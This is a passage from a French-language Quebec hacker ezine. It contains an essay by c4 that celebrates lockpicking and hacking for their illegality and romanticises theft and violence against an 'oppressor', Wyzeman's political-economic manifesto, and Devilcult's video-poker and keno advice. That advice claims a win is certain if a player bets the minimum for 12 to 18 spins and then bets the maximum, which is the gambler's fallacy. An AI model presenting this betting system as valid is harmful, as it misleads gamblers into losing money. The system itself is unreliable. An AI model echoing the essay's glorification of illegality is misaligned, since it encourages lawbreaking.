pfa prennais naissance et mourrais un ans plus tard pour céder la place aux minces tentatives de groupe que sont aujourd'hui hackebec et underground hack. Mindkind sort grand gagnant de cette longue époque de disette avec 8 ezines à sont actif et la plus grosse moyenne en K depuis NPC. Le futur se déssine sous l'aile de la fédérations hack.fr qui regroupe aujourdhui la plus par des groupes quebecois actif ainsi que quelque groupe francais et, la fédération ne cesse de voulloir grossir. wyzeman | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ c4 ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[12]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ La `''.,, ``'.,,-/``--., `.,`'., | ', | Vie `'-.,_ `''.,. `| `-, '.------- '\,_ après `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ le `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ cadena ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : Pourquoi? (effet enigmatique) ]=- En faisant mon ménage la semaine passée, je suis tombé sur 3 vieux cadenas. Sûrement des vieux Mastercraft, mais leurs usures rend la tâche de classification assez ardue. Peu importe, je me sentais comme au paradis, 3 vieux cadenas A MOI. J'avais déjà lockpicker mes autres une vingtaine de fois chacun, alors imaginez-vous la joie et l'étoile dans mes yeux lorsque j'ai faufilé mon regard entre mes vielles cannes de peinture , afin de me rendre où se cachaient mes cadenas. Évidemment, pour le commun des mortels qui lit ceci, il doit probablement être évanoui sur le dos, en train de saigner du nez, et se demander à voix haute "de quoi y parle ce mongole ?". La plupart des gens qui auraient vécus une expérience semblable à la mienne auraient sûrement hésiter à ramasser les 3 cadenas, sous prétexte que ces 3 mêmes cadenas sont bien là, ou peut-être simplement que monsieur se serait dit "un jour, j'suis certain que je vais tomber sur 3 vielles clefs". Et les cadenas auraient continués leur paisible existence derrière une canne de peinture noire et une autre de couleur rouge. Pourtant, je les ai ramassés ... et ce soir, je vais m'amuser , entre 2 bières, à essayer de les lockpicker assis confortablement sur un divan rendu trop vieux pour être encore mou. De façon absurde, un cadenas, c'est en quelque sorte l'arme de défense d'un établissement quelconque. Imaginez que vous devez passer une ligne rouge, et pour ce faire, vous devez, de la façon que vous choisirez, réussir d’abord a traverser la défense (qui se situe a 2 pieds de la ligne), qui est constitué de 4 bonhommes musclés à l'intelligence douteuse. Évidemment, une tonne de solutions s’offre a vous, et que vous êtes pacifiques, violents, timides, méchants, gros, bisexuelle, ou que vous puez simplement dla gueule, toute unes panoplies de solutions peuvent s'adapter à votre style de personnalité. Tirer avec un 22 comme un fou allier, payer en faveur de l'aveuglement des gardiens, leur tendre un piège, leur demander simplement si vous pouvez passer en finissant votre phrase avec svp, divaguer avec eux jusqu'à ce que leur cerveau commencer à boucaner, porter leurs attention sur la jolie Manon qui passe "bizarrement" par la (qui en réalité est votre ami d'enfance habillé avec le linge de sa blonde) ... bref, name it. A ceci dit, vous pouvez donc choisir de lockpicker le cadenas, de le frapper avec une masse, de le dynamiter, de perdre les nerfs après 20 minutes de lockpicking et de decrisser, ou de l’amadouer avec des belles tites clefs sexy. Evidemment, derrière la ligne rouge ce trouve votre but. Et, en ce qui concerne le lockpicking, votre but vari comme les prévisions de météo. Mais tout de même, vous venez de réussir à passer la ligne rouge, votre plan pour déjouer la défense à fonctionné, et vous voila maintenant dans une zone assez dangereuse, ou les attaques offensives peuvent provenir des 4 coter, du haut, pi de vous-même. Votre but, vous le voyez, et peut-être même que vous le sentez, il est tellement proche que ça vous fait peur, et paf! .. vous partez en barrant le cadenas derrière vous. Ni vu ni connu. Derrière la ligne, vous avez peut-être volés, photographiés, sentis, touchés,regardés ou dansés en ligne avec votre ombre ... ça, si vous avez bien fait votre travaille, vous êtes le seul à le savoir. et si vous avez obtenu votre but, vous êtes encore le seul a le savoir. Bref, si la police vient me poser des questions, jva les envoyer vous voir. le pourquoi. Mais (petit voix), pourquoi pourquoi pourquoi ? Ya à peine quelques semaines je m'étais volontairement égarer en foret, admirant les arbres, les ti animaux pi les bruit de VTT. Et c'est là, tout bonnement, que j'ai eu un raisonnement primitif : pourquoi ya pas de messages sociaux, politiques ou économiques de tagger sur les arbres, tout prêt de cette longue route en terre platti ? He bien, parce que l’on élimine la notion du danger. Le danger de tagger "fuck Paul Martin" ou "j'aime mon chat" sur le mure de la banque est immense. Primo, la loi nous l'interdit (la nouvelle morale universelle après l'église). Et on est donc propice à subir le traitement des agents de la paix ... ce qui est la motivation. De nombreux sociologues ont étudiés en long et en large le mot danger, écrivant 323 pages et titrant l’ouvrage à quelque chose du genre "le danger" ou "pourquoi j'ai peur quand je suis en danger, maman ?". C'est quand même assez bizarre de réaliser que tout cette panoplies de pages existent, alors que la définition du mot DANGER est quand même assez explicite. DANGER. n. m. Ce qui est ordinairement suivi d'un malheur, ou qui expose à une perte, à un dommage, etc. On peut donc s'entendre à dire que, ce qui est dangereux, est en faite un évènement ou une situation qui, ordinairement, ou plutôt, DEVRAIT, être suivi d'une conséquence peu amusante. Et c'est justement la conséquence qui nous sert de motivation. L'idée que la conséquence existe, mais qu'on ne la subira pas est en sois amusant et très valorisant. Bref, l'oppresseur nous envoi une tentation du désir. Un non choix : condamner a pensée de tel ou tel façon; et, d'agir de tel ou tel façon, a défaut de subir les foudre de la loi, l'oppresseur en sois. La loi étant établi par le pouvoir, donc, l'oppression par le pouvoir. Le désire, c'est l'idée conscient ou inconsciente de l'illégalité d'un geste, afin de briser l'oppression. Et je ne divague absolument pas (bon ok ok, 2-3 bières de trop) : Le lockpicking est un exemple flagrant ! Sinon, a quoi bon lockpicker ? Le résultat est figurativement l'oppresseur qui vient de peter en 300330 morceaux, ye vaincu, totalement. Imaginez vous en train de lockpicker la serrure d'une porte ... derrière la porte se trouve 1.20$, vous êtés adictés au café du tim horton, vous avez besoin de se 1.20$. Qu'elle est votre but ? he ben d'aller ramasser l’argent et de decrisser au plus sacrant. Vous n'avez que ça en tête ... la sueur qui vous coule jusqu'a votre bouche, partant du front ; vous suez, vos mains sont mouette, vous essayez de vous concentrer sur le cadenas, mais vos mains qui tremblent vous rappellent a quel point ce que vous faite est risquer. Mais l'odeur du café qui passe dans votre tête vous rappelle, tant qua lui, à quelle point il est important de réussir. Woah, vous venez de réussir. Chapeau. Maintenant, allez-y, ne vous gênez pas. Ramasser l’argent. Go ! Et a la seconde ou vous toucher a l’argent, il en résulte quoi ? L'oppresseur vient de perdre. Donc, votre but était à la recherche d'un résultat. Que ce sois de simplement avoir réussi a ouvert le cadenas, d'avoir réussi en plus à voler 2 chaises jaunes, ou photographier une vache; le but, ye dans la tête du sujet en question. Le résultat, il est figurale ... imaginatif : l'oppresseur a terre, la tête à 3 pieds de son corps troué de balles, les mains encore dans ses poches pleines de frics. Et c'est à ce moment que prend vie le lockpicking. Et c'est à ce moment qu'on peut substituer toute chose peu vivante et le ramener a la réalité souvent ennuyante. Toute ce qui nous intéresse anyway, c'est l'illégalité. Faut arrêter de se le cacher. C'est dans se monde qu'on réussi le mieux à mettre en images un système d'oppression, et de le briser. Ou du moins, de le provoquer, jusqu'à ce qu'on finisse par se faire arrêter par la popo. Et j'irais même plus loin dans ma folie : si faire une tarte au sucre serait illégal, y'aurais des tonnes de textes cachés sur des sites webs underground, tel comment faire une tarte au sucre sans laisser de traces, ou comment effacer ces traces après avoir gossé avec la pâte, ou comment se pogner du bon sucre brun pas cher, et de qualité. L'illégalité fascine. Et parmi la panoplie de textes qui naît jour après jour sur internet, essayant d’expliquer les "pkoi ya des hackeux", se résume tous à ça. C'est plate hein ? c'est parce que c’est illégale, rien de plus, rien de moins. Les hackeux a 4.99$ qui se promènent le pentium a l'air sur les chats room, c'est du monde souvent assez ordinaire qui ont trouver une façon a eux-mêmes de briser l'oppression. Il en va de même pour le lockpicking, évidement. Lorsqu’on prend conscience de la nature de nos actes, on doit inévitablement en saisir leur sens,et faire preuve du "gros bon sens". Ce n’est pas à moi de vous faire la morale, mais il existe souvent une énorme différence entre deux gestes de mêmes natures. Mais pour ce qui est des notions de bases idéologiques du bien et du mal, je passe mon tour. Et surtout, la prochaine fois que quelqu'un ose vous dires que c'est sans but de lockpicker chez sois, osez lui demander l'heure, déstabilisé le, frappé le doucement 3 fois sur la jambe gauche et demandez-vous si vous avez encore soif. "Si vous voulez, comme nous, que la liberté entière de l’individu, et conséquemment sa vie, soit respectée - vous êtes forcément amenés à répudier le gouvernement de l’homme par l’homme, quelle que soit la forme qu’il prenne ; vous êtes forcés d’accepter les principes de l’Anarchie, que vous avez si longtemps conspués. Vous devez alors chercher, avec nous, les formes de la société qui puissent le mieux réaliser cet idéal, et mettre fin à toutes les violences qui vous révoltent" - Pierre Kropotkine. and i'll drink to that. Peace, c4 | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Wyzeman ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[13]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ Le `''.,, ``'.,,-/``--., `.,`'., | ', | socialisme `'-.,_ `''.,. `| `-, '.------- '\,_ de `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ sur- `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ production ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : Quand le réalisme frappe à la porte ]=- A non, pas encore de la méchante politique ? He bien oui, mais dites vous chère lecteur, que meme ceux qui déteste la politique et croit que sa ne sert à rien au fond. La politique c'est ce qui gère les relations humaines aussitot que 2 être humain (voir meme 2 être vivants) se fondent en 1 meme sphère d'influence. dès se moment, soit ils se combatront, soit ils sentraideront, soit il signoreront, juste ce choix, souvent faite de facon plus émotive que rationel est un choix politique. Et au fur et à mesure que les effets de se choix se feront sentir, des reglements, explicites ou implicites emergeront de ce berceau politique. De plus malgrés toute les flagelations du monde et tout les principes de mauvaise fois, une hiérarchie s'installera. Juste ou Injuste demeure le seul choix que nous ayons face à cette hierarchie. Refuser cest principe de base est ce que l'on appelle; pratiquer la politique de l'autruche, on se couvre les yeux, on fait semblant que ca n'existe pas et on fini par se retrouver dans une situation qu'on a pas desiré, qu'on a pas choisi et qui nous fait chier terriblement et à laquel seul une force immence pourras renverser l'état d'inertie dans lequel on s'est soit même plongé. Si aujourd'hui la politique est aussi impopulaire, cest grandement du au fait que dans une democratie, on a le gouvernement qu'on merite, donc si majoritairement la population n'est pas interressé à la politique, la politique sera platte, ennuyante sans interet et ininterressé à reglé les problèmes d'une population qui ne croit pas en la politique, en quelque sorte nous sommes face au problème de l'oeuf et de la poule. Si les options qui vous sont offertes ne vous interresse pas, la solution n'est pas de chialler pour que ceux qui offrent des solutions adopte la votre, mais plutot d'amener vous même les conditions qui feront que votre option sera ecouté. Sinon vous pouvez toujours continuer à chialer, mais l'expérience a déja démontrée que ca change pas grand chose. La politique est généralement vu sur un axe x, de -1 a 1 en passant par 0. -1 etant nommé l'ideologie de gauche (avec le communisme comme représentant le plus extrème) et 1 pour la droite (personifié par le libéralisme capitalisme et les groupes dit conservateur). le meilleur d'après socrate etant , "le juste millieu". Les droitistes sont donc invité à mettre de la gauche dans leur vin pour réussir à être élu, et vice versa. Notez que les dictatures on generalement une preference vers la droite, et la pauvreté des dictatures de gauche face aux economies de droite donne peu envie de faire un nouvelle essaie. Bref le probleme majeur consiste à trouver un economie et une politique de centre et non pas un patch dla droite pour la gauche ou un patch dla gauche pour la droite. C'est ce que ce manifeste propose, une nouvelle facon de voir les choses. 1) revus des systèmes politique a) l'anarchie b) dictature c) oligarchie d) democratie e) democratie citoyenne 2) revus des systemes économique a) troque b) mercantilisme c) capitalisme d) communisme e) socialisme 3) le socialisme de sur-production a) réalité économique b) réalité politique 1) revus des systemes politique a) l'Anarchie l'anarchie est la base de tous, elle represente l'absence de gouvernement ou chacun se gère soit même et idéalement dans le bien de la communauté. Bref, peu importe le nombre d'idéaliste que ca va faire saigner du nez, l'anarchie en tant que gouvernement est une utopie qui serait ballayé dès les moments ou un être de la communauté désirerait obtenir un peu plus de pouvoir. De plus l'aparition de leader semble être quelque chose de spontané et de profondement enfouis dans les entrailles de la race humaine. Si l'anarchie ne peu etre un gouvernement viable, elle est cependant à prendre en compte a l'intérieur de chaque gouvernement, et dans les démocraties tout particulierement elle y occupe une très grande place. Rien n'est plus anarchique en effet que les résultats occasionné par le vote de quelques millions délecteur face a des choix insatisfesants. Chacun est dailleur libre de ses pulsions, et ceux qui trouve ca reprimant sont libre de le combattre par des lois et des sanctions, sous l'approbation de la majorité qui préfère rester silencieuse. Si ca ce nest pas lanarchie, dites moi ce que cest. b) Dictature la dictature intervient assez tôt dans l'évolution dune societé, en fait elle apparait dès que plusieur être humain se retrouve a partager un territoire donné, un chef apparait naturellement, de quelque facon que se soit, et généralement fini par imposer ses volonters comme loi et à favoriser ceux qui lui permettre de rester en place. La mornachie n'étant en fait qu'une dictature légitime. les dictatures sont en général trop stricte pour donner quoi que se soit à long terme, et ceux qui réussisse à se déguiser en monarchie termine parralisée dans un culte du passé tout bon à impressionner un collectionneur d'art ancient. c) Oligarchie l'oligarchie est la seul maniere de gerer une population que la race humaine est capable denvisager, que se soit en dictature en monarchie ou feudalisme en democratie ou en communiste, le controle est toujours assurer par un nombre x de personages lier derriere un leader effectif ou de circonstance. Plus le leader du groupe est puissant plus l'oligarchie est une dictature, plus le pouvoir est reparti egalement entre chaque representant plus loligarchie est pure, loligarchie la plus pure est sans doute celle du feudalisme, ou le roi navais pas vraiment plus de pouvoir effectif que ses vassaux. Les federations appartiennes aussi a se genre de gouvernement et les parti politique des democraties en sont la representation, puisque les democratie ne fontqu'alterner des oligarchies pour un nombre x d'annee. d) Democratie ici le peuple possede relativement plus de pouvoir que sous les autres type de gouvernement qui sont a lecoute du bon peuble seulement si il le desires. par contre, la democratie pure na jamais ete tanter, aucun pays na livrer lensemble de ses decisions a un vote de la majoriter. dans le plus democratique des pays l'elite mene toujours, donnant la main a l'anarchie presente qui permet a la dictature di deguiser sont pouvoir supporter oligarchiquement. e) Democratie citoyenne seule une parti citoyenne du peuple peu acceder au avantage ou certain avantage relier au gouvernement, dont le vote principalement. la plus par des democratie citoyenne base la citoyenneter sur un service militaire, ce qui fait que lidee n'est pas tres populaires jusquici. Il a tout de meme lavantage de faire voter ceux qui sont conserner par le vote. Et generalement cette population est plus enclin a voter naturellement. 2) revu des systemes economique a) troque le mode deconomie le plus simple, lechange dobject ou de nourriture contre dautre objet ou dautre nourriture. Ca fait pas des pays fort quand les impots pourrissent au 2 semaine. bref, comme le troque sa suck et que c dur de savoir si 12 oeuf egal une vache, on a du vite inventer d'autre mode economique b) mercantislisme Les premiers a eriger un economie qui vaille la peine den parler fut les premiers etats, ils pratiquait majoritairement une politique de financement de tout les grands projets du pays ainsi qu'une attitude d'exploitation envers les territoires occupé au profits de la capitale, bref l'economie etait totalement etouffer par l'etat, et les petits fabriquant artisanal avait un bien faible poids reussissant tant bien que mal a se nourrir de leur propre travail. c) capitalisme l'emmergeance des classes bourgeoise a precipiter la venu dun regime ou leconomie est laffaire du peuple et non de letat, au plus fort la poche comme on dit. idealement les meilleurs et l'elite trouve les moyens de faire beaucoup plus d'argent que la masse, mais ils repondrons qu'ils travaillent plus, et ma fois, on peu difficilement dire qu'ils ont tord en toute bonne foie. Dans le capitalisme l'arget est la fin de tout, tout sachete tout se vend tout a un prix, ou deux... d) communisme l'inverse totale du capitalisme, chacun ne peu pas posseder plus que sont voisin, l'herbe est aussi jaune partout. 1 seul marque, 1 seul modele, les memes rations pour tout le monde, peu importe leffort, le gars qui torche est aussi important que le dude qui sauve des vie ou qui invente des dooms day device, pas de jaloux et plein dinstatisfait. e) socialisme le patch a la mode par les temps qui coure n'est pas le patch qui aide a arreter de fumer mais le socialisme se patch dla gauche pour un gouvernement de droite permet de se sauver la main haute en gaspillant des milliards en service sociaux inadapter, mais peu importe, tant que limage parrais bien. alors on dilapte insufisament d'argent dans trop de service pour insatisfaire le maximum de personne possible. 3) le socialisme de surproduction le nom donner a cette theorie est plus en relation avec les elements qui convergent vers sa possibiliter que le resultat concret obtenue par la potentiel reussite de sont application. Le socialisme de surproduction est baser sur le principe que puisque nous vivons deja dans une economie artificiel (si le prix etais justement gerer par les sacro-saints principe de loffre et la demande, pratiquement tout sur terre couterais un prix ridiculement bas (songer a tout ces entrepot remplis de stock "non demander"). Cette quelque element du a leur reel rareter conserverais une bonne valeur, mais la majoriter des objects pourrais etre obtenu en echange dun effort qui permetrais la disponibiliter dun objet pour les autres membres du regime. Ce qui permetrais de creer une economie de base de type communiste, et de conserver les attraits de largent et du capitalisme pour seulement les loisirs ou se procurer un mode de vie + luxueux. Peu importe la societe que vous voudrez, il y aura toujours des pognes cul et des gens qui voudrons performer mais tant que vous vous battrez contre un des 2 groupes vous nobtiendrez pas une societe reelement efficace. Voici diviser en 3 points quelque principe de base ou idee qui pourrais permetre letablissement dun telle regime politico-economique. a) la realiter economique Comme je disais plutot, une tres grande parti de la marchandise disponible se trouve dans des entrepots a attendres la semaine des 4 jeudi ou pourrisse avant davoir trouver prenneur, pourtant, quantiter de gens manque de ces objects souvent indispensable, parfois superflus, mais souvent perdu, jetter, bruler, detruis. Et ce pour concerver un regime economique soit performant mais entrainer dans une fuite par en avant des plus mortelle. Il ne couterais pratiquement rien de redistribuer tout ces objects egalement entre tous, ceux ayant mieu pouvant decider de sen passer eviadament, mais il y a fort a parrier qu'il y en aurais pour tout le monde. evidament, si il sagit de la seul mesure en place nous nous retrouvons avec une chute des marchers, une ressession et des problemes a nen plus finir, cest pourquoi, dautre mesure devrais etre adapter simultanement pour modifier leconomie en douceur. Des cie ou un ensemble de societe detat pourrais dans un premier temps offrire la gratuiter de lensemble des besoins de leur employers (a tres peu de faire si la dite cie possede relativement de tout (ferme, epicerie, usine pour toute sorte de produits, magazin de vente au detail, comptable, etc,). des bonus de performance restant disponible et un exedant de salaire relatif a sa tache serais aussi integrer de facon a concerver la competition et le desire davoire plus lemployer si il le desire pourrais aussi avoir loption detre payer normalement et de soccuper soit meme de tout ces obligations financiere. Une telle revolution demanderais un fort controle des institutions economique actuel, mais elles ont lavantage de ne pas etre proteger par un armee, et de pouvoir etre attaquer virtuellement. Le point de rupture arriverais au moment ou les ideologies du socialisme de sur production atteignais 50% des richesses mondiales, a se moment un retour en arriere serais difficilement envisageable. b) la realiter politique il est bien connu que les cie daujourdhui possede souvent plus de capaciter que certain gouvernement, une superstructure privee telle que enoncer plus haut pourrais rapidement prendre le controle politique en sassurant le controle economique. si une majoriter de leur sallarier adopte le plan de paye "socialisme de surproduction" vous beneficier dun electorat deja vendu a vos principes, et qui sera conscient de sa capaciter de fonctionner a grande echele. De plus en menant des campanges inteligente il est possible de venir a bout des vieux polititiens en manque dimagination. par exemple pourquoi ne pas reparer une rue, ou construire une bibliotheque avec largent de votre campagne plutot que de placarder votre face sur des milliers de panquate ? de plus internet de nos jour permet de batir des structures qui ne prenne pas compte des reels frontieres des pays, il est donc possible de creer une revolution des principes a travers la planetes avec des groupes organiser dans toute les zone dinfluence politique et ce sans trop deffort et a moindre coup. Creer des ecoles privee permetrais aussi damenager une penser favorable a vos politiques, surtout si elle se trouve a etre gratuite aux fils demployer (Devrais dailleur faire parti des service essentiel fournis par le contrat de type socialisme de surproduction) ainsi qu'au futur employer (par contrat). Les ecoliers devrais se voir payer tout leur besoin essentiel, et recevoir un salaire minimum, les employers pourrais decider de se reperformer dans les ecoles sans contraintes. Wyzeman . ., `.`. `, ; , | \ --`k `, \`_/` | / ,/ , , /`/ .., . \ ; ; `-,=--`'` | | | *. \_/ .`,-----\ \ . | : -=*=- .-`/ \ ' ,.` .` `-. : `` \ `-` .` . * .````'-, \ /` ,.-''''''. .` / / `.\ `. ,-` ` .` ', _- | .`'; . _.--`` _-'```''` `-. `'-'` |. ` /|. `.\ / `. , .` /, `\ \`\ / ..` | , /___;__;__\ / .` | , ` , ` | .* ` . . \ .` | : : /\ `''--, `.. | . `; / \ / . .-._ .` | i i / \ `-_', `-.` |` ; | --,, \ ```., | ___. __l `'-' ;'--.,, | | `\ / `'`--. : `', | `\ \ / `'`----, ; \, \. \ \/ .`, `'-, ; `. ', \ ` . _.., `'----------,, \ \ \______-` '-` ``'-., ,.-, _;.- '`. `, `, `. ``'-'` ''` ,' ,` _________`--.,;..,.`,..,, .``. .--=--...` , , ,,.,;,,.--`______ ` ` | | | | | | | | | | | | |___________________ Et pour ceux qui on pas les moyens de se payer une citrouille décente cette année, au lieu de réutilisé celle jeté à noel l'année passé, essayer donc se truc ;] Etes vous un de ces gambler qui passe leur paye dans une machine a video poker sans meme en retirer un soul mais recommence parreille la semaine d'après? Si oui ceci est pour vous. Je vais expliquer tout d'abord comment une machine de video poker functionne et ensuite comment augmenter vos chance de gagner. Je ne peu pas dire comment gagné instantanément parce que ces tout simplement impossible a moin que vous avez en possession des outil pour exploiter la machine directement, mais sa je n'en connait aucun. Comment sa marche Premierement il y a plusieur jeux de hazard sur une machine a video poker, mais il functionne tous de la meme maniere, tout comme les grateux ou billet de lottery. Admetton que l'on parle des "slot machine". Ceux que vous avez habituellement des fruit qui tourne et s'arrete sur une serie, si vous en avez 3 de la meme sorte et bien vous gagné le lot indiquer. Il y a habituellement 9 case, et environ 10 sorte de fruit avec laquelle vous pouvez gagné (Si vous en avez 3(ou +) parreille.). Donc 9 case avec 10 possibility, 1 case * 10 possibilité x 9 case total ce qui donne 90 chance. Mais sa ne s'arrete pas la, car comme les gratteux, si on jourait au 7 chanceux on ne gagnera pas instantanément au 7ieme grateux. Il y a des serie de combinaison qui peu se repeter et peu atteindre jusqua des million de combinaison. Par example (Les chiffre remplace nimporte quel sorte de fruit): (1) (2) (3) (4) 0 1 0 0 1 0 8 2 7 0 1 0 2 0 1 2 1 8 8 7 2 2 0 1 3 8 2 9 4 6 9 2 4 3 7 2 Et ainsi de suite je pourrait repeter les meme combinaison une a la suite de l'autre etc. Ils faut se dire que ces serie son predeterminer par la machine, a chaque fois que la machine s'ouvre, elle prend quelque seconde pour loader en memoire toute les combinaison possible * X million et part du numero 1 juska la fin (aléatoirement). Comme si vous liriez un livre et quelqun disait stop, vous lui liser la ligne que vous etes entrain de lire sur le moment, quand vous reparter a lire et il vous redit stop, vous arreter a une ligne different qui n'est pas necessairement la suivante. Donc vous vous dite surment que ces impossible de gagné, et bien d'étromper vous. Ceux qui font des loto veule que leur monde continue a jouer donc il leur attribue des montant qui son parfois extrement payant (500$ et meme plus dans les casino). Mais comment faire pour augmenté vos chance ? Assez simple en fait, il suffit de miser le montant le plus petit pendant un certain nombre de tour, je vous conseil entre 12 et 18. Si vous n'avez pas gagné pendant dison 12 tour, augmenter votre mise a max, et jouer jusqua temp que vous gagné. Vous allez gagné ses sur et certain mais on ne saura pas quel montant. Quand vous aurez gagné le montant, redescendant a mise minimum et refait la meme chose. Sa vous permeterra peu etre pas de gagné automatiquement de largent, mais sa augmente vos chance de beaucoup. Ces comme si on jourait a un jeu de cache cache. Premierement on se met d'accord sur le fait que si vous jouer 30 coup et ne gagnez pas, et bien ce nest vraiment pas votre jour de chance, arreter de jouer et aller vous coucher. Mais bon, habituellement vous gagné 5 fois en 30 coup environ. Donc si je cache 5 object dans 30 place differente et que je joue 15 fois, il ne reste que la moitier des place a regarder, donc jai une chance sur 3 de gagné (5/15). Ces se que j'entend par "augmenter vos chance" et croyez moi sa marche. Et bien sure avec ma maniere de jouer, attender vous pas a jouer et quitter apres 10 minute de jeu, sa peu durer tres longtemp ce petit jeux car vous perdez moin d'argent qua l'habitude (si vous etes le genre a toute miser et go je lai ou je lai pas). Alors c'était les slot machine, ce n'est pas ceux que je prefere car vos chance de gagné son vraiment mais vraiment minime. Parlon d'un jeux que j'adore maintenant, le keno. C'est probablement le jeux qui vous fera gagné le plus d'argent. Comment jouer au Keno: Premierement il y a 80 chiffre afficher a l'écran. Vous pouvez en choisir de 1 a 10 et la machine pigera ensuite 20 chiffre au hazard (donc le 1/4 des chiffre a l'écran) et si vos chiffre son choisi vous gagné le montant indiquer. Pour gagné a sa, on prend la meme technique pour augmenter nos chance a la slot machine. Mais tout d'abord je vous conseil de ne choisir que 2 chiffre a la fois, vous aurez plus de chance au depart d'avoir les 2 chiffre (meme si le montant gagner avec 2 chiffre est bas) Miser le minimum au depart, choisissez vous 2 chiffre, et jouer entre 12 et 18 coup. Si vous gagné, continuer a jouer petit jusqua temp que vous perdez. Le montant gagné est de 11 credit si vous avez les 2 chiffre. Donc vous attender de perde les 12 a 18 coup (habituelement je n'attend que 12) et commencer a miser au MAX. Je croit que le maximum est de 4 credit (1$) donc si vous gagner vous gagner 4x la mise indiquer, soit 44 credit (10 dollar et quelque sous). Le keno+ existe aussi, ces le meme principe que le keno normal mais 1 des 20 chiffre pigerau hazard par la machine vous donne 4x le montant gagné, donc si vous avez 2 chiffre, a 4 credit, et que l'un de vos chiffre "brille grace au +" vous avez 88 credit, ce qui fait quand meme 22$. Ces sur que si vous jouer avec un dollar, oublier tout mes truc sa ne marchera pas. Ils vous faut un fond d'environ 20 a 50 dollar pour pouvoir jouer de la maniere que j'ai expliquer ci haut. Car ils faut attendre un certain nombre de tour et ces tour ne sont pas gratuit. Il y a aussi plusieur sorte de jeu dans les slot machine, je n'ai pas tout parler mais ces toujours le meme principe qui est d'attendre un certain nombre de tour et commencer a miser plus haut. Ce que je vous ai expliquer ne sont pas des manieres de gagné au machine mais d'augmenter vos chance. Je me repete la dessus mais je veux que ce soit bien clair, les truc que je vous ai dit ameliore votre style de jeu et vous fait perde moin rapidement. Donc cela vous donne plus de temp pour jouer avec vos sous et donc plus de chance. Beaucoup de personne joue mise max avec plusieur billet de 20$ non-stop jusqua temp qu'ils ont plus d'argent ou gagne le maximum que la machine peu payer, mais tres souvent ils en ressorte les poche vide. Mes truc sert a essayé d'égaliser vos chance avec la machine, mais jamais vous allez egalez la machine, car elle a été fabriquer pour gagné, ils se peu fortement par compte que vous gagné un gros lot de temp en autre, ces pour sa que je vous ai expliquer comment depenser votre argent moin rapidement, pour peu etre atteindre un de ces gros lot avec seulment 20$, se que quelqun qui depense rapidement aurait atteint avec 500$. Je vous conseille personnelement de ne jamais jouer au jeux de carte sur ces machine, car vos chance son presque null. Mais sa reste un jeux avant tout, donc si vous jouez, ne jouer pas pour gagné mais pour vous amusez. Devilcult Ya pus d'autres conclusions.. ... .. .